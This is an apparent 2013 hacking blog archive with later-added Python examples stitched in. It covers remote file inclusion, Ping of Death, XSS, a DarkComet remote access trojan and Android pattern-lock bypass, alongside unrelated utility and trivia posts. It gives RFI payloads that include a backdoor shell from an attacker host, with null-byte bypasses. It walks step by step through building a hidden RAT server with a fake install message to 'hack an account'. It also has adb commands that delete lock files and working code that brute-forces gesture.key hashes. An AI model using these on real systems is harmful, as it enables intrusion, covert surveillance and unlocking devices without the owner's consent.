Tuesday, 17 December 2013

41) Testing Remote File Inclusion vulnerability in web applications

Remote file inclusion (RFI) is a critical vulnerability caused by insufficient validation of user input that the web application passes to a file-inclusion function. It allows an attacker to make the server load and execute a remotely hosted malicious file, such as a backdoor shell.


Vulnerable Code
Let us say a webpage called "RFI.php" loads its content from an external file named by the 'filename' parameter.

In this example, RFI.php loads the code from 'news.php'.

HTTP request:
http://site/RFI.php?filename=news.php

Let us check the PHP code of RFI.php :
code(RFI.php):

   <?php
        include($_GET['filename']);   // user input becomes the file to include, unchecked
   ?>
The include() function reads the specified file (news.php), evaluates it as PHP code and inserts the output at that point in RFI.php.

Content of news.php file

As you can see, the developer did not validate 'filename' and passed it directly to include(). That is the Remote File Inclusion vulnerability.


Testing the Vulnerability:
Let us test whether the application is vulnerable to Remote File Inclusion by passing "http://www.google.com" as the filename parameter. (This test only succeeds when allow_url_include is enabled on the server; with it off the include fails, but the same unvalidated parameter may still be exploitable for local file inclusion.)

HTTP request:
http://site/RFI.php?filename=http://www.google.com


Hurrah, it successfully loaded the content from google.com :) It means the page is vulnerable to RFI :D

Exploiting the vulnerability:
An attacker with malicious intent can load a backdoor shell. The shell runs with the privileges of the web server process, which gives the attacker arbitrary command execution on the server and a foothold to compromise it further.

For Example:
http://site/RFI.php?filename=http://attacker/shell.txt

The shell is hosted with a non-PHP extension such as .txt so that the attacker's own server sends the PHP source instead of executing it; the victim's include() then runs it.



Using this shell, the attacker can do anything the web server's account is allowed to do. For instance, he can delete the index.php file.

Example 2:

In most web applications, the filename is passed as a parameter without the extension (.php).

For example:
http://site/RFI.php?filename=news


------------------------
Code of RFI.php:
------------------------
<?php
        include($_GET['filename'].".php");   // ".php" appended, but still no validation
 ?>
As you can see in the above code, the ".php" extension is appended to the filename in the PHP code.

So, if we pass "shell.txt", the filename becomes "shell.txt.php", which results in an error.



To avoid this error, you can use a Null Byte. The null byte (%00 in the URL) marks the end of a string in C, and PHP's file functions used to stop reading the path there, so everything after it is ignored.

We can put the null byte at the end of our filename so that the appended ".php" is dropped:

http://site/RFI.php?filename=http://attacker/shell.txt%00

Note that PHP 5.3.4 and later reject paths containing a null byte, so this trick only works on older installations. For a remote URL there is a simpler alternative: end the filename with "?" so the appended ".php" becomes part of the query string and the attacker's server still serves shell.txt:

http://site/RFI.php?filename=http://attacker/shell.txt?

---------
If you would like to test how a remote file inclusion attack works, you can download our vulnerable app "BTS Pentesting Lab" from here:
http://code.google.com/p/bts-pentesting-lab/

In case you would like to see real-world examples, here is a list of vulnerability reports:
Exploit-Db

 How to Prevent Remote File Inclusion vulnerability
  • Turn off 'allow_url_include' in php.ini (it has been off by default since PHP 5.2.0) and, if your code never needs to open remote URLs, 'allow_url_fopen' too. 'register_globals' was removed in PHP 5.4, but disable it on older versions. This stops remote inclusion only: the same unvalidated parameter can still be used for local file inclusion.
  • Validate users' input: treat the parameter as a page name, compare it against a fixed list of allowed pages, and never build the include path from the raw value.
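To see both RFI.php variants and the two fixes side by side, here is an added example (written for this page, not code from the original post or the BTS lab) that models in Python what each version of include() would load for a given 'filename' value. PAGES_DIR and ALLOWED_PAGES are assumed names; nothing is fetched or executed.

```python
# Added example (not from the original post): models how the two RFI.php
# variants above resolve the 'filename' parameter, beside two hardened
# resolvers. Nothing is fetched or included; each function only returns
# what PHP *would* have loaded. PAGES_DIR and ALLOWED_PAGES are assumptions.
import posixpath
from urllib.parse import unquote, urlsplit

PAGES_DIR = "/var/www/site/pages"             # hypothetical document directory
ALLOWED_PAGES = {"news", "about", "contact"}  # the only names the app should include


def legacy_include_target(param, append_ext=False, null_byte_bug=True):
    """include($_GET['filename']) or, with append_ext, include($_GET['filename'].".php")
    on a server with allow_url_include=On. null_byte_bug=True reproduces
    PHP < 5.3.4, where a NUL byte silently truncated the path; False reproduces
    5.3.4+, which refuses such paths. Returns (kind, target)."""
    value = unquote(param)                      # the web server decodes %00 to a real NUL
    if append_ext:
        value += ".php"
    if "\x00" in value:
        if not null_byte_bug:
            return ("rejected", "null byte in path")
        value = value.split("\x00", 1)[0]       # C string ends here: ".php" is dropped
    if urlsplit(value).scheme in ("http", "https", "ftp"):
        return ("remote", value)                # anything after '?' is a query, not a path
    return ("local", posixpath.normpath(posixpath.join(PAGES_DIR, value)))


def hardened_include_target(param):
    """Allowlist fix: the parameter is a page *name* looked up in a fixed set,
    so neither URLs, traversal nor NUL bytes can reach include()."""
    name = unquote(param)
    if name not in ALLOWED_PAGES:
        return None                             # reject; never try to 'clean' the value
    return posixpath.join(PAGES_DIR, name + ".php")


def contained_include_target(param):
    """Fallback when a fixed allowlist is impractical: refuse NUL bytes and URL
    schemes, then require the normalized path to stay inside PAGES_DIR."""
    value = unquote(param)
    if "\x00" in value or urlsplit(value).scheme:
        return None
    path = posixpath.normpath(posixpath.join(PAGES_DIR, value + ".php"))
    return path if path.startswith(PAGES_DIR + "/") else None


if __name__ == "__main__":
    for p in ["news.php", "http://www.google.com", "http://attacker/shell.txt"]:
        print(f"include({p!r}) -> {legacy_include_target(p)}")
    for p in ["news", "shell.txt", "http://attacker/shell.txt%00",
              "http://attacker/shell.txt?", "../../../../etc/passwd"]:
        print(f"include({p!r}.'.php')  old PHP -> {legacy_include_target(p, True)}")
        print(f"                       new PHP -> {legacy_include_target(p, True, False)}")
        print(f"                      hardened -> {hardened_include_target(p)}"
              f" / {contained_include_target(p)}")
```

The allowlist resolver is the one to prefer: it never lets the raw value near the file system, so there is nothing to bypass. The containment check is only a fallback, and it shows why the fix is not "strip http://" but a positive decision about which paths are acceptable.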

Monday, 16 December 2013

40) Transfer data over 100GB from one place to another via email Using Split Tool

Transfer data over 100GB from one place to another via email, pen drive or other storage device. If you want to transfer a file from one place to another but don't have enough space on your pen drive or other external device, or you want to send large data via email, it is better to split the file into pieces, transfer the small files one by one and merge them later.
HJSplit is the best freeware tool available to Windows users for this purpose. It supports file sizes of over 100 GB. In addition, this software doesn't require any installation. Just download the zip file, extract HJSplit.exe on your computer and double-click to run it. Here's how you can split a file and then rejoin the pieces to end up with a fully functional file.
Splitting a file
 
1. Double-click on the HJSplit.exe file to run it. Now click on the Split button.
 
2. Click on the Input File button to choose the file you want to split.
 
3. Click on the Output button to choose the location for the output files.
 
4. Then click on Start button to start the process.
 
NOTE: The process of splitting the file will start, and a progress bar will show the status. The time it takes depends on the size of the file you are splitting.
Merge files
1. Run the tool again

39) Free Data Recovery Tools

1. Recuva

It is free data recovery software from Piriform, the same team that gave us CCleaner and Defraggler.

It is simple and easy to use.

Capable of recovering files deleted from the recycle bin, memory cards and other portable devices.

It also has a deep scan mode, where your chances of getting the data back are even better.

Regarding compatibility, it runs well up to Windows 7 32-bit. Haven't tested it with Windows 8 yet.

It is also available as a portable version, i.e. you can run it directly from the downloaded file, which is definitely an advantage!

2. Pandora Recovery


It is also capable of recovering permanently deleted files from your hard drives.

Has a preview mode where you can view recoverable images and text from your hard drives.

There is an option called surface scan, where you can search for files on corrupted or reformatted partitions.

There is also a helpful wizard which can guide you through the recovery process.

It is compatible up to Windows 7.

3. Tokiwa Data Recovery

It is the easiest-to-use data recovery tool currently available.

It has a simple interface with a few but powerful options.

A scan button scans for recoverable files.

You can also search for a specific file by typing the file name in the search box.

There is also a wipe button which can permanently delete the recoverable files from any partition except the drive where your OS is installed.

4. Free UnDelete

It is just another simple tool for data recovery.

Supports various file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32.

Available both in portable as well as installer versions.

5. Avira UnErase Personal

Avira UnErase Personal is a bit older than the other tools listed here but still works well.

It supports file systems such as NTFS 1.0, NTFS 2.0, FAT12, FAT16 and FAT32 like others.

It also supports dynamic disks, software and hardware RAID, volume sets and stripe sets which is useful for advanced users.

The interface is less graphical and consumes less memory, which is definitely good for low-spec systems.

It is also available as portable version.

Sunday, 15 December 2013

38) Ping of Death


The ping of death attack is one of the oldest network attacks. The principle simply involves creating an IP datagram whose total size exceeds the maximum allowed size (65,535 bytes).

When such a packet is sent to a system with a vulnerable TCP/IP stack, it will cause the system to crash.
The Ping of Death attack relied on a bug in the Berkeley TCP/IP stack which also existed on most systems that copied the Berkeley network code. The ping of death was simply sending oversized ping packets.

The maximum allowable IP packet size is 65,535 bytes, including the packet header, which is typically 20 bytes long. An ICMP echo request is an IP packet whose ICMP header is 8 bytes long. Therefore, the maximum allowable size of the data area of an ICMP echo request is 65,507 bytes (65,535 - 20 - 8 = 65,507).

However, many ping implementations allow the user to specify a packet size larger than 65,507 bytes. A grossly oversized ICMP packet can trigger a range of adverse reactions such as denial of service (DoS), crashing, freezing and rebooting.

The ping of death attack, or PoD, can cripple a machine based on a flaw in its TCP/IP implementation. Since the maximum size for a packet is 65,535 bytes, a packet that reassembles to more than that overruns the fixed-size buffer the receiving stack allocated for it, and the machine crashes.

Sending a single packet of this size is impossible on the wire, since the IP length field cannot even represent it, but attackers get around this by sending the datagram in fragments. Each fragment is legal on its own; only when the fragments are reassembled on the receiving computer does the overall size exceed 65,535 bytes. Stacks that did not check the fragment offset plus its length against that limit overflowed their reassembly buffer and crashed. Current operating systems make that check and discard the datagram, so the classic attack only works against unpatched, vintage systems.
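As an added example (not part of the original post), the following Python builds an oversized ICMP echo request and splits it into IPv4 fragments exactly as described above, then shows the bounds check a receiver needs. Addresses, the IP identifier and the MTU are constructed values, and nothing is put on the wire.

```python
# Added example (not from the original post): builds the fragments of an
# oversized ICMP echo request the way an attacker's ping would, and shows
# the reassembly check a receiver needs. Nothing is sent; packets are bytes.
# Addresses, IP ID and MTU are made-up constants.
import struct

IP_MAX_TOTAL = 65535             # 16-bit Total Length: largest legal IPv4 datagram
IP_HDR_LEN = 20                  # IPv4 header without options
ICMP_ECHO_HDR_LEN = 8            # type, code, checksum, identifier, sequence
MAX_ECHO_DATA = IP_MAX_TOTAL - IP_HDR_LEN - ICMP_ECHO_HDR_LEN   # 65507, as in the text
MTU = 1500                       # Ethernet: each fragment carries at most 1480 data bytes
MAX_FRAG_OFFSET = (1 << 13) - 1  # Fragment Offset is 13 bits, counted in 8-byte units


def inet_checksum(data):
    """RFC 1071 one's-complement checksum used by the IP and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _ip(dotted):
    return bytes(int(octet) for octet in dotted.split("."))


def icmp_echo_request(payload, ident=0x1234, seq=1):
    """ICMP type 8 (echo request) carrying `payload`; this is what ping sends."""
    csum = inet_checksum(struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def ipv4_fragments(transport, src="10.0.0.1", dst="10.0.0.2", ident=0xBEEF, mtu=MTU):
    """Split `transport` into IPv4 fragments that each fit the MTU.
    Returns (more_fragments, offset_in_8_byte_units, header + data) per fragment.
    Every fragment is a perfectly legal packet; only their sum is oversized."""
    chunk = (mtu - IP_HDR_LEN) // 8 * 8          # 1480: non-final fragments are multiples of 8
    frags = []
    for start in range(0, len(transport), chunk):
        data = transport[start:start + chunk]
        more = start + len(data) < len(transport)
        offset = start // 8
        if offset > MAX_FRAG_OFFSET:
            raise ValueError("fragment offset does not fit in 13 bits")
        flags_offset = (0x2000 if more else 0) | offset   # MF flag sits above the 13 offset bits
        hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR_LEN + len(data), ident,
                          flags_offset, 64, 1, 0, _ip(src), _ip(dst))   # protocol 1 = ICMP
        hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]  # fill checksum
        frags.append((more, offset, hdr + data))
    return frags


def reassembled_total_length(frags):
    """What a receiver that trusts the fragments ends up with: the IP header
    plus the furthest byte any fragment claims to occupy."""
    end = max(offset * 8 + len(pkt) - IP_HDR_LEN for _, offset, pkt in frags)
    return IP_HDR_LEN + end


def fragment_is_sane(offset, pkt):
    """The check a hardened stack makes before copying a fragment into its
    reassembly buffer: offset plus length must not end beyond 65535 bytes."""
    return IP_HDR_LEN + offset * 8 + (len(pkt) - IP_HDR_LEN) <= IP_MAX_TOTAL


if __name__ == "__main__":
    for label, size in (("largest legal ping", MAX_ECHO_DATA),
                        ("ping of death", MAX_ECHO_DATA + 3)):
        frags = ipv4_fragments(icmp_echo_request(b"A" * size))
        bad = [o for _, o, p in frags if not fragment_is_sane(o, p)]
        print(f"{label}: {len(frags)} fragments, reassembles to "
              f"{reassembled_total_length(frags)} bytes, rejected offsets: {bad}")
```

Only three extra data bytes separate the largest legal ping from the oversized one; the last fragment of the latter is the single packet a vulnerable stack should have refused, because its offset plus length lands past the 65,535-byte buffer.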

37) What is #XSS ?

We got some messages asking about XSS, i.e. Cross Site Scripting, so here is a short description of it. I will also write an article on our blog about it.


What is #XSS ?

So what exactly is XSS? XSS stands for Cross Site Scripting. You could also call it CSS, but a web designer would read that as Cascading Style Sheets, so let it be XSS. In this attack the attacker injects malicious script (usually JavaScript) into a page that other users view, and the script runs in the victim's browser with that site's privileges. The attacker can then steal admin cookies, set up an XSS worm, an XSS shell, etc. Traditionally XSS is divided into two types, with DOM-based XSS as a third.

************Non-Persistent

Non-persistent is also known as Reflected XSS. As the name suggests, the payload is reflected back in the response to the very request that carried it (typically in a URL parameter) and is never stored on the server. When doing such an attack the attacker has to hide the script from the victim, for example behind an encoded or shortened link, because the victim must open the crafted URL.

************Persistent

Persistent is also known as Stored XSS. In this type the malicious code is stored by the application (in a comment, profile field, etc.) and served to every visitor of that page, so whenever a victim opens the page the script runs.

************DOM Based

DOM stands for Document Object Model. In this type the vulnerability is in the client-side JavaScript itself, which writes attacker-controlled data (such as part of the URL) into the document without encoding it, so the payload may never even reach the server.
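The reflected and stored cases above in runnable form, as an added example that is not from the original post: a search page rendered three ways (unescaped, with only tags neutralised, and properly escaped) plus a small comment board. The markup and the test inputs are constructed for this example, and `is_reflected_unencoded` is the check a tester makes on the response.

```python
# Added example (not from the original post): a reflected search page rendered
# three ways, to show why only context-aware escaping stops XSS, plus a stored
# variant. The page markup and the sample inputs are constructed for this example.
import html

# Constructed page: the query lands in a text node AND inside an attribute value.
TEMPLATE = ('<p>Results for: {q}</p>\n'
            '<input type="text" name="q" value="{q}">')


def render_vulnerable(query):
    """Reflected XSS: the parameter is copied into the HTML untouched."""
    return TEMPLATE.format(q=query)


def render_strip_tags(query):
    """A common half-fix: neutralise < and > only. Safe in the text node,
    still exploitable inside the value="..." attribute via a quote."""
    return TEMPLATE.format(q=query.replace("<", "&lt;").replace(">", "&gt;"))


def render_escaped(query):
    """Escape &, <, >, " and ' so the value cannot break out of either context."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


def is_reflected_unencoded(page, payload):
    """Tester's check: did the payload come back byte-for-byte, i.e. unencoded?"""
    return payload in page


class CommentBoard:
    """Stored (persistent) XSS: the same mistake, but the payload is saved and
    replayed to every later visitor instead of just the one who sent it."""

    def __init__(self):
        self._comments = []

    def post(self, text):
        self._comments.append(text)        # store raw; encoding belongs at output time

    def render(self, escape=True):
        items = (html.escape(c, quote=True) if escape else c for c in self._comments)
        return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


if __name__ == "__main__":
    tag_payload = "<script>alert(document.cookie)</script>"       # text-node payload
    attr_payload = '" autofocus onfocus="alert(document.cookie)'  # attribute break-out
    for name, fn in (("vulnerable", render_vulnerable),
                     ("strip <>", render_strip_tags),
                     ("escaped", render_escaped)):
        print(f"{name:>10}: script tag reflected={is_reflected_unencoded(fn(tag_payload), tag_payload)}"
              f", attribute break-out reflected={is_reflected_unencoded(fn(attr_payload), attr_payload)}")
    board = CommentBoard()
    board.post(tag_payload)
    print("stored, unescaped:", board.render(escape=False))
    print("stored, escaped:  ", board.render())
```

The second payload is the one worth remembering: it contains no angle brackets at all, so any "filter" that only looks for `<script>` passes it straight into the attribute and the injected event handler fires.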

If anybody has any problems, comment here and I will reply to you.

Saturday, 14 December 2013

36) HACK AN ACCOUNT USING A REMOTE ADMINISTRATION TOOL [RAT]

A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers over the Internet or across a local network. A remote administration tool is based on server and client technology. The server part runs on the controlled computer and receives commands from the client, which is installed on another remote host. A remote administration tool works in the background and hides from the user. The person who controls it can monitor the user's activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, and turn off or restart the computer.



Go on http://www.no-ip.com/, Create your Account and click on "Download".


Now Click on "Windows"

Now Click on "Download 3.0.4"

Now you must install No-IP DUC 3.0; click on "Next"


Now, choose "Install Location" and click on "Next"

Now choose "Start Menu Folder" and Click on "Install"

Setup was completed successfully, click on "Close"

Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.

Now, click on "Add a Host"

Choose a "Hostname", enter your IP address (the public IP of the machine that will run the DarkComet client; the port you choose later must also be reachable from outside, e.g. forwarded on your router) and click on "Create Host".

Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"

Now, Select your "HOST" and click on "Save".

Done, you can close No-IP DUC 3.0

Download DarkComet v4.0 here and run DarkComet.

Click on [+], choose your port (I advise 1604) and click on "Listen".

Now click on "Settings".

Click on "No-IP Updater" and type your No-IP information.

Now you will edit your server: click on "Edit Server", then "Network Settings", enter your information and click on "Test network".

Click on "Module Startup" and choose your settings.

Click on "Install Message" and choose your fake message.

Now click on "Module Shield" and choose your settings.

Now click on "Build Module" and click on "Build Server".

See the Results

35) WORLDS TOP 10 HACKERS !!

Hackers in Hollywood tend to be portrayed in extremes: they're either modern-day equivalents of James Bond or anti-social yet tech-savvy teenagers looking for ways to amuse themselves at the expense of other computer users. The truth is, hackers are an assortment of IT-knowledgeable individuals who are responsible both for billions of dollars of losses yearly and for the unstoppable evolution of the World Wide Web. As such, this article will tackle the good, the bad, and the geeky hackers of modern-day computing.

1. Shawn Fanning: This hacker helped revolutionize (that is, enact actual, irrefutable change in) the music industry, particularly in the domain of music distribution. Together with Sean Parker and Jordan Ritter, the three visionaries set out to launch Napster, a P2P application that ultimately popularized the free exchange of music files via the Internet.

2. Robert Morris: He is the author of the first Internet worm. His namesake worm exploited a buffer overflow in fingerd and the debug backdoor in sendmail in order to spread from host to host. After his conviction (he received probation, community service and a fine rather than prison), he co-founded Viaweb with Paul Graham, a startup that was bought by Yahoo for a considerable sum.

3. VallaH: This hacker was the one responsible for the first smart DoS attack, ping-of-death, and jolt.c, which entertained script kiddies across cyberspace and brought entire multinational companies to their knees.

4. Gordon Lyon: Better known by the nom de net "Fyodor", Lyon is credited as the creator of Nmap (the hacker's tool that has made a big enough impact on pop culture to appear in movies like "The Matrix Reloaded" and "The Bourne Ultimatum"), the founder of insecure.org, and a pioneer of service fingerprinting.

5. Kevin Mitnick: He's arguably the most famous real-life black hat hacker because of all the media and press attention he has received over the last decade. He was held for more than four years awaiting trial, denied bail, before being sentenced to three years and ten months with credit for the time he had already spent in jail. He now runs his own IT security company.

6. The Mentor: This pseudonymous, cultish hacker figure was the author of the Hacker Manifesto published in Phrack magazine. He served as an inspiration to a generation of kids worldwide who wanted to become hackers just like him.

7. Karl Koch: This German hacker from the 1980s was far better known for his controversial antics (e.g., his paranoia about the Illuminati, his obsession with the number 23, and his cocaine addiction) than for his involvement in a computer espionage incident during the Cold War.

8. Richard Jones: A young Australian hacker (also known by the code name of Electron) who spread disorder across the Internet with nothing more than a modem and his technical know-how. After being arrested by Australian Federal Police in 1990 and serving time in jail, he eventually became a security consultant and researcher.

9. Kevin Poulsen: He's a former black hat hacker who's now the senior editor of Wired News. He once used his hacking skills to "phreak" his way into winning an LA radio contest and getting a brand new Porsche, but he was ultimately caught and arrested for his actions.

10. Adrian Lamo: This grey hat hacker demonstrated to everyone across the globe that it is possible to break into large websites with little more than a browser, by manipulating URLs. He is now a journalist.

34) How To Change The Logon Screen Background Of Windows 7

Windows 7 makes it possible to change the welcome screen that appears when you start your computer without any third-party software, but this setting is well hidden. You can set any image you like as your background.
This setting is intended for original equipment manufacturers (OEMs) to customize their systems, but there’s nothing stopping you from using it yourself. All you have to do is change a single registry value and put an image file in the correct location.

Enabling Custom Backgrounds

This feature is disabled by default, so you’ll have to enable it from the Registry Editor. You can also use the Group Policy Editor if you have a Professional version of Windows – scroll down a bit for the Group Policy Editor method.
Launch the Registry Editor by typing regedit into the search box in the Start menu and pressing Enter.
In the Registry Editor, navigate to the following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
You’ll see an DWORD value named OEMBackground. If you don’t see it, right-click in the right pane, point to the New submenu and create a new DWORD value with this name.
Double-click the OEMBackground value and set its value to 1.
Note that selecting a new theme in the Appearance and Personalization window will “unset” this registry value. Selecting a theme will change the value of the key to the value stored in the theme’s .ini file, which is probably 0 – if you change your theme, you’ll have to perform this registry tweak again.
Changing the setting in group policy will allow it to persist even when you change your theme, but the Group Policy Editor is only available in Professional editions of Windows.
If you have access to the Group Policy Editor, launch gpedit.msc from the Start menu.
Navigate to the following section in the Group Policy Editor window:
Computer Configuration\Administrative Templates\System\Logon
You’ll find a setting named “Always use custom login background.” Double-click it and set it to Enabled.

Setting An Image

Your image file must be less than 256 KB in size. It’s also a good idea to use an image file that matches the resolution of your monitor, so it won’t look stretched.
Windows looks for the custom logon screen background image in the following directory:
C:\Windows\System32\oobe\info\backgrounds
By default, the info and backgrounds folders don’t exist. Navigate to the C:\Windows\System32\oobe folder and create them yourself by right-clicking inside the folder, pointing to New, and selecting New Folder.
Copy your desired background image to the backgrounds folder and name it backgroundDefault.jpg.
The change will take effect immediately – no system reboot required. The first time you log out or lock your screen (try the WinKey-L keyboard shortcut), you’ll see your new background.

Third-Party Tools

You don’t have to do this by hand. There are a variety of third-party tools that automate this process for you, like Windows Logon Background Changer, which we’ve covered in the past. Windows Logon Background Changer and other utilities just change this registry value and put the image file in the correct location for you.

To get the default logon screen back, just delete the backgroundDefault.jpg file. Windows will use the default background if no custom background image is available.

Tuesday, 3 December 2013

33) Crack Or Unlock Android Pattern From Android Device

List of required things:
1.     Linux distro
2.     Android phone
3.     USB cable
4.     ADB


Step-1

1. Connect your Android device to your PC using the USB cable.

Step-2:- Installing ADB over terminal

1. Boot into any Linux distro you have.
2. Open up a terminal and type:

sudo apt-get install android-tools-adb

The above command installs ADB (this is the package name on Debian and Ubuntu derivatives).

Step-3:- Disabling pattern unlock over terminal

1. Open up the terminal again and type:

adb devices
adb shell
cd data/system
su
rm *.key

Note that adb only sees the phone if USB debugging is enabled in its developer settings, and `su` (and therefore the rm) only works on a rooted device. The *.key files are the lock-screen pattern/password hashes; removing them leaves the device without a lock.


After that, disconnect your Android device and reboot it.
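Added example (not from the original post) of what the *.key files removed above contain and how one of them can be recovered rather than deleted: on Android 5.x and earlier, /data/system/gesture.key is the unsalted SHA-1 of the pattern's cell indices (0-8, row by row), so a copy taken with `adb pull` (root required, as above) can be brute-forced offline. The pattern in the demo is made up.

```python
# Added example (not from the original post): what the *.key files deleted
# above contain, and how one of them can be recovered offline instead of
# deleted. On Android 5.x and earlier, /data/system/gesture.key holds the
# unsalted SHA-1 of the pattern's cell indices (0-8, row by row), so a copy
# pulled with `adb pull` (root needed) is brute-forced in seconds. The
# pattern used in the demo is made up.
import hashlib


def pattern_hash(cells):
    """Contents of gesture.key for a pattern given as cell indices, e.g. [0, 1, 2, 5, 8]."""
    return hashlib.sha1(bytes(cells)).digest()


def _cell_between(a, b):
    """Index of the cell lying exactly between a and b on the 3x3 grid, else None."""
    ra, ca = divmod(a, 3)
    rb, cb = divmod(b, 3)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None                                   # not a straight line through a cell
    return ((ra + rb) // 2) * 3 + (ca + cb) // 2


def valid_patterns(min_len=4, max_len=9):
    """Yield every pattern the lock screen accepts: 4 to 9 distinct cells, where a
    cell may only be jumped over if it is already part of the pattern."""
    def extend(path, used):
        if len(path) >= min_len:
            yield list(path)
        if len(path) == max_len:
            return
        for nxt in range(9):
            if used & (1 << nxt):
                continue
            mid = _cell_between(path[-1], nxt)
            if mid is not None and not used & (1 << mid):
                continue                              # would skip an unvisited cell
            path.append(nxt)
            yield from extend(path, used | (1 << nxt))
            path.pop()

    for start in range(9):
        yield from extend([start], 1 << start)


def crack_gesture_key(digest, max_len=9):
    """Return the cell sequence whose SHA-1 equals the 20-byte `digest`, or None.
    The whole space is 389,112 patterns, so this finishes in seconds."""
    for cells in valid_patterns(max_len=max_len):
        if hashlib.sha1(bytes(cells)).digest() == digest:
            return cells
    return None


if __name__ == "__main__":
    # Constructed key: the SHA-1 a device would store for the pattern 0-1-2-5-8.
    stored = pattern_hash([0, 1, 2, 5, 8])
    print("gesture.key =", stored.hex())
    print("pattern     =", crack_gesture_key(stored))
```

Because the hash is unsalted and the input space is tiny, deleting gesture.key is not even necessary to get past the lock; the same weakness is why later Android releases moved pattern verification to a salted, hardware-backed gatekeeper.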